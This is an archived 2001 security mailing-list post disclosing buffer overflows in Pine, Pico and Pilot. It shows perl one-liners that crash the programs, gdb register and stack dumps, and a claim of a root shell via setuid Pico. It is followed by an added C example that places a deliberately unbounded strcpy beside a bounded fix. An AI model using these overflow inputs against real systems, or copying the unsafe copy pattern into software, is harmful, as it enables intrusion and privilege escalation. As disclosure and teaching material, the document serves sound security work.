From: uexploit xeightwo (xploithackermail.com)
Date: Wed Nov 28 2001 - 05:54:09 CST

     Pine, Pico, Pilot Program Overflow bug.

     I could find an overflow limitation of a similar kind in several versions
     as a result of investigating the pine program.

     What is PINE? Pine (Program for Internet News & Email) has powerful functions
     and various configuration options as a Unix mail program (Mail User Agent),
     developed at the University of Washington.

     Along with Pico (message composition editor), which is loved as a text editor,
     Pine includes Pilot (file browser), which is used as a file browser.

     For further information, visit the Pine Information Center at
     URL: http://www.washington.edu/pine/
     download URL: ftp://ftp.cac.washington.edu/pine/

     Limitations that I found:

     - Pico frame pointer overflow: --------------------------------------------------|
     
     URL: http://my.dreamwiz.com/hackingm/lecture/pico.txt

     The Pico version that I tested is 3.5.

     Anyway, the overflow limitation does not happen from pico version 3.8 on.
     When the editor comes up, save under another name (the file name is long).

     Only tested on two linux 6.x box servers that I'm using ...
     The pico version on both servers was 3.5,
     and both executed a root shell as a result of setting the setuid bit.

     Reference examination URL: http://my.dreamwiz.com/hackingm/test.txt

     ---------------------------------------------------------------------------------|

     I could find a limitation that is very similar to the above attack and happens absurdly.
     The programs were Pilot and Pine.

     I received the current edition through ftp download.
     It consisted of binaries.

     download URL: ftp://ftp.cac.washington.edu/pine/unix-bin/

     0x01. Pilot Program bug testing:

     [x82testsub /tmp]$ ls -al pilot-bin.linux
     -rwxr-xr-x 1 x82 x82 493976 Nov 28 18:31 pilot-bin.linux
     [x82testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x616'`
     [ File name too long: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ]
     
     [x82testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x617'`
     Segmentation fault
     [x82testsub /tmp]$ whereis pilot
     pilot: /usr/bin/pilot /usr/man/man1/pilot.1
     [x82testsub /tmp]$
     [x82testsub /tmp]$ gdb -q /usr/bin/pilot
     (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x237'`
     [ File not found: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ]
     (no debugging symbols found)...t `perl -e 'print "x"x237'`
     Program received signal SIGSEGV, Segmentation fault.
     0x40057272 in ?? ()
     (gdb) info reg
     eax 0xffffff26 -218
     ecx 0x0 0
     edx 0x40144c60 1075072096
     ebx 0x78787878 2021161080
     esp 0xbffff808 0xbffff808
     ebp 0x4 0x4
     esi 0x78787878 2021161080
     edi 0x78787878 2021161080
     eip 0x40057272 0x40057272
     eflags 0x10246 66118
     cs 0x23 35
     ss 0x2b 43
     ds 0x2b 43
     es 0x2b 43
     fs 0x0 0
     gs 0x0 0
     (gdb)

     For reference, they are all the same UW PILOT 2.0 version.

     0xbffff4e0: 0x3a646e75 0x78782220 0x78787878 0x78787878
     ~~~ ... ~~~ 0x78787878 0x78787878 0x78787878 0x78787878
     0xbffff5d0: 0x22787878 0xbffff800 0x0804a089 0xbffff8e8

     (gdb) x $esp
     0xbffff804: 0x40057270
     (gdb)

     (ebp) 0xbffff800 + 0x00000004 = 0xbffff804 (esp)
           0xbffff804 -------------> 0x40057270 (eip)

     0x02. Pine Program bug testing:

     Happily, the limitation did not happen in PINE 4.42, which is the new version.
     The following is the PINE 4.10 version that I'm using.

     [x82testsub /tmp]$ whereis pine
     pine: /usr/bin/pine /usr/man/man1/pine.1
     [x82testsub /tmp]$ pine `perl -e 'print "x"x50000'`
     Segmentation fault
     [x82testsub /tmp]$

     Let's test another version.
     The following was tested on PINE 4.30.

     bash$ gdb -q pine
     (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x50000'`
     (gdb) r
     Starting program: /usr/bin/pine `perl -e 'print "x"x50000'`

     (no debugging symbols found)...(no debugging symbols found)...
     Program received signal SIGSEGV, Segmentation fault.
     0x40295c99 in chunk_free (ar_ptr=0x40336f60, p=0x83488c0) at malloc.c:3121
     3121 malloc.c: No such file or directory.
     (gdb)

     Also, you can see that a segfault comes up.
     I think impatiently that there is no time for composure for me.
     I could not afford to test versions after 4.30.

     I wish that other people would. :-D

     Author: Xpl017Elz
     E-mail: szoahchotmail.com & xploithackermail.com
     Home: http://x82.i21c.net

     P.S: Always so ...
          Sorry. I gave up on proper English.
          I will study English from next time, so that other people can understand.
          Thank you for reading my unwise writing. ^-^*

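As an added illustration, not code from this post nor from Pine, Pico or Pilot, the pattern behind the crashes shown above: a fixed-size stack buffer receiving an unbounded copy of a command-line file name, shown next to a bounded version that rejects over-long names with the kind of "File name too long" message pilot prints. The buffer size, the function names and the constructed 'x'-filled sample names are assumptions; the 616/617 lengths are taken from the pilot session above only to show where a correct bound check must fail.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Hypothetical buffer size; the real programs' limits are not on the page. */
#define NAME_MAX_LEN 256

/* Vulnerable pattern: strcpy() copies the whole argument regardless of length,
 * so an argument of NAME_MAX_LEN bytes or more runs past 'name' into the saved
 * frame pointer and return address (the 0x78787878 seen in ebp/esi/edi in the
 * gdb session above). Shown for contrast only; never called by the test. */
int open_by_name_unsafe(const char *arg)
{
    char name[NAME_MAX_LEN];
    strcpy(name, arg);             /* no bound: overflow when strlen(arg) >= 256 */
    return (int)strlen(name);
}

/* Hardened version: look for the terminating NUL only inside the destination
 * bound, refuse the name if it is not there, then copy exactly what fits.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG otherwise. */
int open_by_name_safe(const char *arg, char *out, size_t out_len)
{
    const char *nul = memchr(arg, '\0', out_len);   /* never scans past out_len */
    if (nul == NULL) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, arg, (size_t)(nul - arg) + 1);       /* +1 copies the NUL; fits by check */
    return 0;
}

/* Test helper: build a constructed name of 'len' bytes of 'x' (as the perl
 * one-liners above do) and report what the hardened routine does with it. */
int try_name_of_length(size_t len)
{
    char out[NAME_MAX_LEN];
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL)
        return -2;
    memset(arg, 'x', len);
    arg[len] = '\0';
    rc = open_by_name_safe(arg, out, sizeof out);
    free(arg);
    return rc;
}

int main(int argc, char **argv)
{
    char name[NAME_MAX_LEN];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <filename>\n", argv[0]);
        return 2;
    }
    if (open_by_name_safe(argv[1], name, sizeof name) != 0) {
        /* Same shape of message pilot prints, truncated so it cannot overflow either. */
        fprintf(stderr, "[ File name too long: \"%.55s \" ]\n", argv[1]);
        return 1;
    }
    printf("ok: %s\n", name);
    return 0;
}
```

The point of the bounded version is that the check and the copy use the same number, the size of the destination, so a name of any length is either accepted whole or rejected before a single byte is written; the unsafe version has no number at all, which is why its behaviour flips from an error message to a crash at a length the author had to find by trial.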